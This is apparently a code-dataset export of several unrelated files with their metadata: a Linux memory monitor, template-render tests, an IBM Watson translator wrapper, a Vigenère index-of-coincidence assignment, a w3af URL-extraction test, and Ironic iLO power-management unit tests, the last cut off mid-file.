selboo/Linux-Monitor
| 5
|
6628479
|
#!/usr/bin/env python
#coding=utf8
from func import *
def Memory_Get_Info():
Proc_MemInfo = Read_Proc('meminfo')
Dick_MemInfo = {}
for i in Proc_MemInfo:
Dick_MemInfo[i.split()[0][0:-1]] = int(i.split()[1])
return Dick_MemInfo
def Memory(data):
Memory = Memory_Get_Info()
MemTotal = Memory['MemTotal']
MemFree = Memory['MemFree']
Buffers = Memory['Buffers']
Cached = Memory['Cached']
SwapTotal = Memory['SwapTotal']
SwapFree = Memory['SwapFree']
MemUsage = MemTotal - MemFree - Buffers - Cached
SwapUsage = SwapTotal - SwapFree
result = {}
result['MemTotal'] = Bytes(MemTotal)
result['MemUsage'] = Bytes(MemUsage)
result['MemBuffers'] = Bytes(Buffers)
result['MemCached'] = Bytes(Cached)
result['SwapTotal'] = Bytes(SwapTotal)
result['SwapUsage'] = Bytes(SwapUsage)
data['memory'] = result
return data
|
#!/usr/bin/env python
#coding=utf8
from func import *
def Memory_Get_Info():
Proc_MemInfo = Read_Proc('meminfo')
Dick_MemInfo = {}
for i in Proc_MemInfo:
Dick_MemInfo[i.split()[0][0:-1]] = int(i.split()[1])
return Dick_MemInfo
def Memory(data):
Memory = Memory_Get_Info()
MemTotal = Memory['MemTotal']
MemFree = Memory['MemFree']
Buffers = Memory['Buffers']
Cached = Memory['Cached']
SwapTotal = Memory['SwapTotal']
SwapFree = Memory['SwapFree']
MemUsage = MemTotal - MemFree - Buffers - Cached
SwapUsage = SwapTotal - SwapFree
result = {}
result['MemTotal'] = Bytes(MemTotal)
result['MemUsage'] = Bytes(MemUsage)
result['MemBuffers'] = Bytes(Buffers)
result['MemCached'] = Bytes(Cached)
result['SwapTotal'] = Bytes(SwapTotal)
result['SwapUsage'] = Bytes(SwapUsage)
data['memory'] = result
return data
|
ru
| 0.166716
|
#!/usr/bin/env python #coding=utf8
| 2.887295
| 3
|
test/test_render.py
|
tekknolagi/makesite-demo
| 1,744
|
6628480
|
import unittest
import makesite
class RenderTest(unittest.TestCase):
"""Tests for render() function."""
def test_oneline_template(self):
tpl = 'foo {{ key1 }} baz {{ key2 }}'
out = makesite.render(tpl, key1='bar', key2='qux')
self.assertEqual(out, 'foo bar baz qux')
def test_multiline_template(self):
tpl = 'foo {{ key1 }}\nbaz {{ key1 }}'
out = makesite.render(tpl, key1='bar')
self.assertEqual(out, 'foo bar\nbaz bar')
def test_repeated_key(self):
tpl = 'foo {{ key1 }} baz {{ key1 }}'
out = makesite.render(tpl, key1='bar')
self.assertEqual(out, 'foo bar baz bar')
def test_multiline_placeholder(self):
tpl = 'foo {{\nkey1\n}} baz {{\nkey2\n}}'
out = makesite.render(tpl, key1='bar', key2='qux')
self.assertEqual(out, 'foo bar baz qux')
|
import unittest
import makesite
class RenderTest(unittest.TestCase):
"""Tests for render() function."""
def test_oneline_template(self):
tpl = 'foo {{ key1 }} baz {{ key2 }}'
out = makesite.render(tpl, key1='bar', key2='qux')
self.assertEqual(out, 'foo bar baz qux')
def test_multiline_template(self):
tpl = 'foo {{ key1 }}\nbaz {{ key1 }}'
out = makesite.render(tpl, key1='bar')
self.assertEqual(out, 'foo bar\nbaz bar')
def test_repeated_key(self):
tpl = 'foo {{ key1 }} baz {{ key1 }}'
out = makesite.render(tpl, key1='bar')
self.assertEqual(out, 'foo bar baz bar')
def test_multiline_placeholder(self):
tpl = 'foo {{\nkey1\n}} baz {{\nkey2\n}}'
out = makesite.render(tpl, key1='bar', key2='qux')
self.assertEqual(out, 'foo bar baz qux')
|
en
| 0.693953
|
Tests for render() function.
| 3.286943
| 3
|
final_project/languagetr.py
|
SV1997/xzceb-flask_eng_fr
| 0
|
6628481
|
<gh_stars>0
'''this module provide translation service'''
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
APIKEY="<KEY>"
URL='''https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985'''
authenticator=IAMAuthenticator(APIKEY)
translator=LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
translator.set_service_url(URL)
def en2fr(mess):
'''
This function translate english to french
'''
# mess=input("enter text: ")
mess=[mess]
translation=translator.translate(text=mess,model_id='en-fr').get_result()
return translation['translations'][0]['translation']
def fr2en(mess):
'''
This function translate french to english
'''
# mess = input("enter text: ")
mess=[mess]
translation = translator.translate(text=mess, model_id='fr-en').get_result()
return translation['translations'][0]['translation']
# text=input("enter text: ")
# C=en2fr('Hello')
# print(type(C))
# C=str(C)
# fr2en(C)
|
'''this module provide translation service'''
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
APIKEY="<KEY>"
URL='''https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985'''
authenticator=IAMAuthenticator(APIKEY)
translator=LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
translator.set_service_url(URL)
def en2fr(mess):
'''
This function translate english to french
'''
# mess=input("enter text: ")
mess=[mess]
translation=translator.translate(text=mess,model_id='en-fr').get_result()
return translation['translations'][0]['translation']
def fr2en(mess):
'''
This function translate french to english
'''
# mess = input("enter text: ")
mess=[mess]
translation = translator.translate(text=mess, model_id='fr-en').get_result()
return translation['translations'][0]['translation']
# text=input("enter text: ")
# C=en2fr('Hello')
# print(type(C))
# C=str(C)
# fr2en(C)
|
en
| 0.321213
|
this module provide translation service https://api.eu-gb.language-translator.watson.cloud.ibm.com/instances/a70261ee-0e59-4e9e-b460-3b7b0380c985 This function translate english to french # mess=input("enter text: ") This function translate french to english # mess = input("enter text: ") # text=input("enter text: ") # C=en2fr('Hello') # print(type(C)) # C=str(C) # fr2en(C)
| 3.354475
| 3
|
Assignment 7 solution code/vigenereIC.py
|
RitvikKhanna/AntiKasiskiExamination
| 1
|
6628482
|
# Assignment 7 - Question 2,3,4 (Combined)
# Submitted By: <NAME> & <NAME>
# 1479093 & 1505703
# The line of the code
# list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
import math,sys,random
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
# For testing purposes only
message = 'PPQCAXQVEKGYBNKMAZUHKNHONMFRAZCBELGRKUGDDMA'
print(stringIC(message))
print(keylengthIC(message))
# *** Question - 2 *** #
def stringIC(message):
# Returns the index of coincidence for a string
# Empty dictionary for getting the count for all the letters
wordDict = {}
sum1 = 0
# Getting count of every character in the message
for symbol in message:
# getCount function returns the count of the particular letter in the message
count = getCount(symbol,message)
# Put that word with the count in the dictionary
wordDict[symbol] = count
# Finding the actual IC
for key in wordDict:
count = wordDict[key]
# Numerator for the formula of IC
sum1 += count*(count-1)
# Denominator for the formula of IC
N = len(message)*(len(message)-1)
# Return the desired value
return(sum1/N)
# *** Question - 3 *** #
def subseqIC(ciphertext, keylen):
# Calculates the average index of coincidence for all substrings
# in a vigenere encrypted string given a keylength
sumofICs = 0
n = 0
for i in range(keylen):
# Get a substring (enciphered with a particular letter from the key)
s = getNthSubkeysLetters(i, keylen,ciphertext)
# increment count and record an IC for this substring
n += 1
sumofICs += stringIC(s)
return(sumofICs/n)
# *** Question - 4 *** #
def keylengthIC(ciphertext):
# Empty dictionary - with keys as key-lengths and value as their corresponding result of subseqIC
keyList = {}
# Empty list of top 5 possible keys
possibleKeys = []
# For all possible key-lengths 1 - 20 (including)
for length in range(1,21):
# Get the average
average = subseqIC(ciphertext,length)
# Entering the value in the dictionary
keyList[length] = average
# Make a list of the key and corresponding value in a tuple and append it to the list.
# We converted it to the list to sort as we cannot sort the dictionary
list1 = keyList.items()
# The line below was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
# We did this to sort the list in descending order
list1 = sorted(list1, key=lambda x: x[1],reverse = True)
# Take the first 5 elements from the sorted list above and append it to the possibleKeys list.
for i in range(0,5):
possibleKeys.append(list1[i][0])
# Return the list with the top 5 possible keys
return(possibleKeys)
# *** This function was introduced for Question - 2 *** #
# This function returns the count of the particular symbol in the message passed.
# Example: For getCount(A,'ABA') - it returns 2
# getCount(B,'ABA') - it returns 1
# getCount(A,'AABCHJASGFA') - it returns 4
def getCount(symbol,message):
count = 0
for character in message:
if(character == symbol):
count += 1
return(count)
# Taken from vigenereHacker.py published on - inventwithpython.com/hacking
def getNthSubkeysLetters(n, keyLength, message):
# Returns every Nth letter for each keyLength set of letters in text.
# E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
# getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
# getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
# getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
i = n - 1
letters = []
while i < len(message):
letters.append(message[i])
i += keyLength
return ''.join(letters)
if __name__ == '__main__':
main()
|
# Assignment 7 - Question 2,3,4 (Combined)
# Submitted By: <NAME> & <NAME>
# 1479093 & 1505703
# The line of the code
# list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
import math,sys,random
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
# For testing purposes only
message = 'PPQCAXQVEKGYBNKMAZUHKNHONMFRAZCBELGRKUGDDMA'
print(stringIC(message))
print(keylengthIC(message))
# *** Question - 2 *** #
def stringIC(message):
# Returns the index of coincidence for a string
# Empty dictionary for getting the count for all the letters
wordDict = {}
sum1 = 0
# Getting count of every character in the message
for symbol in message:
# getCount function returns the count of the particular letter in the message
count = getCount(symbol,message)
# Put that word with the count in the dictionary
wordDict[symbol] = count
# Finding the actual IC
for key in wordDict:
count = wordDict[key]
# Numerator for the formula of IC
sum1 += count*(count-1)
# Denominator for the formula of IC
N = len(message)*(len(message)-1)
# Return the desired value
return(sum1/N)
# *** Question - 3 *** #
def subseqIC(ciphertext, keylen):
# Calculates the average index of coincidence for all substrings
# in a vigenere encrypted string given a keylength
sumofICs = 0
n = 0
for i in range(keylen):
# Get a substring (enciphered with a particular letter from the key)
s = getNthSubkeysLetters(i, keylen,ciphertext)
# increment count and record an IC for this substring
n += 1
sumofICs += stringIC(s)
return(sumofICs/n)
# *** Question - 4 *** #
def keylengthIC(ciphertext):
# Empty dictionary - with keys as key-lengths and value as their corresponding result of subseqIC
keyList = {}
# Empty list of top 5 possible keys
possibleKeys = []
# For all possible key-lengths 1 - 20 (including)
for length in range(1,21):
# Get the average
average = subseqIC(ciphertext,length)
# Entering the value in the dictionary
keyList[length] = average
# Make a list of the key and corresponding value in a tuple and append it to the list.
# We converted it to the list to sort as we cannot sort the dictionary
list1 = keyList.items()
# The line below was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value
# We did this to sort the list in descending order
list1 = sorted(list1, key=lambda x: x[1],reverse = True)
# Take the first 5 elements from the sorted list above and append it to the possibleKeys list.
for i in range(0,5):
possibleKeys.append(list1[i][0])
# Return the list with the top 5 possible keys
return(possibleKeys)
# *** This function was introduced for Question - 2 *** #
# This function returns the count of the particular symbol in the message passed.
# Example: For getCount(A,'ABA') - it returns 2
# getCount(B,'ABA') - it returns 1
# getCount(A,'AABCHJASGFA') - it returns 4
def getCount(symbol,message):
count = 0
for character in message:
if(character == symbol):
count += 1
return(count)
# Taken from vigenereHacker.py published on - inventwithpython.com/hacking
def getNthSubkeysLetters(n, keyLength, message):
# Returns every Nth letter for each keyLength set of letters in text.
# E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
# getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
# getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
# getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
i = n - 1
letters = []
while i < len(message):
letters.append(message[i])
i += keyLength
return ''.join(letters)
if __name__ == '__main__':
main()
|
en
| 0.722996
|
# Assignment 7 - Question 2,3,4 (Combined) # Submitted By: <NAME> & <NAME> # 1479093 & 1505703 # The line of the code # list1 = sorted(list1, key=lambda x: x[1],reverse = True) was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value # For testing purposes only # *** Question - 2 *** # # Returns the index of coincidence for a string # Empty dictionary for getting the count for all the letters # Getting count of every character in the message # getCount function returns the count of the particular letter in the message # Put that word with the count in the dictionary # Finding the actual IC # Numerator for the formula of IC # Denominator for the formula of IC # Return the desired value # *** Question - 3 *** # # Calculates the average index of coincidence for all substrings # in a vigenere encrypted string given a keylength # Get a substring (enciphered with a particular letter from the key) # increment count and record an IC for this substring # *** Question - 4 *** # # Empty dictionary - with keys as key-lengths and value as their corresponding result of subseqIC # Empty list of top 5 possible keys # For all possible key-lengths 1 - 20 (including) # Get the average # Entering the value in the dictionary # Make a list of the key and corresponding value in a tuple and append it to the list. # We converted it to the list to sort as we cannot sort the dictionary # The line below was taken from stackoverflow - https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value # We did this to sort the list in descending order # Take the first 5 elements from the sorted list above and append it to the possibleKeys list. # Return the list with the top 5 possible keys # *** This function was introduced for Question - 2 *** # # This function returns the count of the particular symbol in the message passed. # Example: For getCount(A,'ABA') - it returns 2 # getCount(B,'ABA') - it returns 1 # getCount(A,'AABCHJASGFA') - it returns 4 # Taken from vigenereHacker.py published on - inventwithpython.com/hacking # Returns every Nth letter for each keyLength set of letters in text. # E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA' # getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB' # getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC' # getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
| 3.918746
| 4
|
packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py
|
ZooAtmosphereGroup/HelloPackages
| 0
|
6628483
|
<filename>packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
test_re_extract.py
Copyright 2019 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
from w3af.core.data.parsers.utils.re_extract import ReExtract
from w3af.core.data.parsers.doc.url import URL
class TestReExtract(unittest.TestCase):
def test_relative_regex(self):
doc_string = '123 ../../foobar/uploads/foo.png 465'
base_url = URL('https://w3af.org/abc/def/')
re_extract = ReExtract(doc_string, base_url, 'utf-8')
re_extract.parse()
references = re_extract.get_references()
self.assertEqual(references, [URL('https://w3af.org/foobar/uploads/foo.png')])
|
<filename>packages/w3af/w3af/core/data/parsers/utils/tests/test_re_extract.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
test_re_extract.py
Copyright 2019 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
from w3af.core.data.parsers.utils.re_extract import ReExtract
from w3af.core.data.parsers.doc.url import URL
class TestReExtract(unittest.TestCase):
def test_relative_regex(self):
doc_string = '123 ../../foobar/uploads/foo.png 465'
base_url = URL('https://w3af.org/abc/def/')
re_extract = ReExtract(doc_string, base_url, 'utf-8')
re_extract.parse()
references = re_extract.get_references()
self.assertEqual(references, [URL('https://w3af.org/foobar/uploads/foo.png')])
|
en
| 0.853346
|
# -*- coding: utf-8 -*- test_re_extract.py Copyright 2019 <NAME> This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
| 2.155723
| 2
|
ironic/tests/unit/drivers/modules/ilo/test_power.py
|
mpardhi23/ironic
| 2
|
6628484
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for IloPower module."""
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
from ironic.common import boot_devices
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules.ilo import common as ilo_common
from ironic.drivers.modules.ilo import power as ilo_power
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers.modules.ilo import test_common
from ironic.tests.unit.objects import utils as obj_utils
ilo_error = importutils.try_import('proliantutils.exception')
INFO_DICT = db_utils.get_test_ilo_info()
CONF = cfg.CONF
@mock.patch.object(ilo_common, 'get_ilo_object', spec_set=True, autospec=True)
class IloPowerInternalMethodsTestCase(test_common.BaseIloTest):
def setUp(self):
super(IloPowerInternalMethodsTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context, driver='ilo', driver_info=INFO_DICT,
instance_uuid=uuidutils.generate_uuid())
CONF.set_override('power_wait', 1, 'ilo')
CONF.set_override('soft_power_off_timeout', 1, 'conductor')
def test__get_power_state(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
self.assertEqual(
states.POWER_ON, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'OFF'
self.assertEqual(
states.POWER_OFF, ilo_power._get_power_state(self.node))
ilo_mock_object.get_host_power_status.return_value = 'ERROR'
self.assertEqual(states.ERROR, ilo_power._get_power_state(self.node))
def test__get_power_state_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.get_host_power_status.side_effect = exc
self.assertRaises(exception.IloOperationError,
ilo_power._get_power_state,
self.node)
ilo_mock_object.get_host_power_status.assert_called_once_with()
def test__set_power_state_invalid_state(self, get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
ilo_power._set_power_state,
task,
states.ERROR)
def test__set_power_state_reboot_fail(self, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
exc = ilo_error.IloError('error')
ilo_mock_object.reset_server.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task,
states.REBOOT)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_reboot_ok(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'PowerOff',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.REBOOT)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_off_fail(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'FinishedPost',
'FinishedPost', 'FinishedPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task,
states.POWER_OFF)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.hold_pwr_btn.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_on_ok(self, get_post_mock, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['PowerOff', 'PowerOff', 'FinishedPost']
target_state = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, target_state)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft rebooting', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok_initial_power_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'OFF'
get_post_mock.side_effect = ['FinishedPost', 'PowerOff',
'FinishedPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'power on', 'node_id': task.node.uuid,
'time_consumed': 1})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(attach_boot_iso_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_on(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'InPost', 'InPost', 'InPost', 'InPost'])
ilo_mock_object.press_pwr_btn.side_effect = [None, exc]
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_timeout(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost',
'PowerOff', 'InPost', 'InPost', 'InPost'
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_ok(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost', 'PowerOff'
'PowerOff', 'PowerOff']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_POWER_OFF, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft power off', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_fail(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_timeout(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'InPost', 'InPost',
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_with()
self.assertFalse(log_mock.called)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.ACTIVE
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
setup_vmedia_mock.assert_called_once_with(task, 'boot-iso')
set_boot_device_mock.assert_called_once_with(task,
boot_devices.CDROM)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
